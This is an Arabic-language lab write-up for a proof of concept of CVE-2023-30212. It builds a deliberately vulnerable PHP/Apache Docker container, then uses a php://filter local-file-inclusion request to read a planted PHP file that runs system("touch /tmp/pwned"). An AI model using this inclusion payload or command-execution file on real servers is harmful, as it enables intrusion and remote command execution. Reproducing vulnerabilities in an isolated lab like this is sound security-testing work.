
PoC لـ CVE-2023-30212 باستخدام Docker
PoC لـ CVE-2023-30212 باستخدام Docker
يغطي هذا التقرير إعداد بيئة ويب ضعيفة قائمة على Docker لثغرة CVE-2023-30212 غير الموجودة في Vulhub، وإثبات هذه الثغرة عبر PoC.
php:8.1-apachevulnerable.php و malicious.php إلى الدليل /var/www/html8088
| الملف | الوصف |
|---|---|
vulnerable.php | ملف PHP يحتوي على ثغرة LFI |
malicious.php | ملف PHP ضار ينفذ أوامر النظام |
docker-compose.yml | ملف إعدادات لتكوين الحاوية |
Dockerfile | ملف إعدادات لإنشاء صورة Docker |




docker-compose up -d
اسم الحاوية: cve-2023-30212-cve-lfi-1
سيتم تشغيل خادم Apache ويمكن الوصول إليه عبر http://localhost:8088
http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php

عند فك تشفير الناتج، يظهر كود PHP التالي:
<?php system("touch /tmp/pwned"); ?>

http://localhost:8088/malicious.php
بعد تنفيذ الأمر، يجب إنشاء الملف /tmp/pwned.
docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp
إذا كان ملف pwned موجودًا في النتيجة، فهذا يعني النجاح.
